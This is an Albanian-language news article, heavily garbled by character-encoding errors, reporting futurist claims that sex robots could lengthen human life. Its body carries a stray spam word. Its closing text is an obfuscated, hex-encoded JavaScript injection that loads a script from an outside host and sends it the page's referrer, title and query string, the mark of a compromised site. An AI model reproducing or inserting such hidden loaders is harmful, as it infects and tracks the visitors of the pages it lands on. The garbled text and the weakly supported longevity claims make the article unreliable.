robot3

FuturizA�m: RobotA�t e seksit do ta zgjasin jetA�n e njeriut! (Foto)

Artikulli i cili A�shtA� publikuar disa ditA� mA� parA� nA� “Transhumanity”, merret me “robotA�t e dashurisA�”, tA� cilA�t pA�rdoruesve tA� ardhshA�m mund ta��ju sjellin a�?orgazmat e jetA�gjatA�sisA�a�?, tA� cilat janA� superiore dhe mA� intensive se gjithA�ka qA� njerA�zit – vetA�m ose nA� A�ift – janA� nA� gjendje tA� arrijnA�. Orgazmat e tilla mund tA� shtojnA� kualitetin e jetA�s, ndA�rsa rezultatet do tA� ishin tA� pabesueshme pA�r mirA�qenien tonA�. drugs33.

MegjithatA�, lidhja midis seksit dhe shA�ndetit nuk A�shtA� studiuar mirA�. Derisa pasuesit e legjendarit Wilhelm Reich pohojnA� se orgazmat janA� ideale pA�r shA�ndetin, tA� tjerA�t argumentojnA� se fjala A�shtA� pA�r diA�ka qA� tingA�llon mirA�, por qA� nuk bazohet nA� shkencA�.

 

MegjithatA�, nA� librin a�?The Longevity Projecta�? (Projekti jetA�gjatA�sia) jepet njA� pasqyrA� e njA� studimi 80-vjeA�ar, sipas tA� cilit gratA� qA� pA�rjetojnA� orgazma – dhe atA� shpesh – jetojnA� mA� gjatA� se ato qA� nuk e kanA� kA�tA� fat.

NdA�rsa, futuristA�t thonA� se sekreti i jetA�gjatA�sisA� sonA� qA�ndron tek “robotA�t pA�r seks”.

a�?Seks-robotA�t duhet tA� jetA� mA� tA� dA�shirueshA�m, mA� tA� durueshA�m, tA� etur dhe tA� prirA� pA�r altruizA�m, mA� shumA� se konkurrentA�t njerA�zor. PA�rveA� kA�saj, do tA� kenA� dijet seksuale tA� mbledhura me mijA�ra vite dhe do tA� jenA� tA� pajisura me mjete tA� pabesueshmea�?, thuhet nA� faqen e internetit.

Besohet po ashtu se robotA�t do tA� zA�vendA�sojA� gratA� nA� profesionin mA� tA� vjetA�r nA� botA�: prostitucionin.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}